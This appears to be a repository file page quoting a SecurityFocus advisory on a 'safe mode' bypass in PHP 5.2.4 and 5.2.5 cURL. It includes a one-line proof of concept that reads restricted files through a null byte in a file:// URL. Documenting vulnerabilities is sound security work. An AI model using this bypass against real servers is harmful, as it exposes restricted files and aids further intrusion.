4c796b9bb3
This reverts commit c2c270feef
.
624 B
624 B
disable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL
PHP 5.2.4 and 5.2.5 PHP cURL
From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/
source: http://www.securityfocus.com/bid/27413/info
PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
The issue affects PHP 5.2.5 and 5.2.4.
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));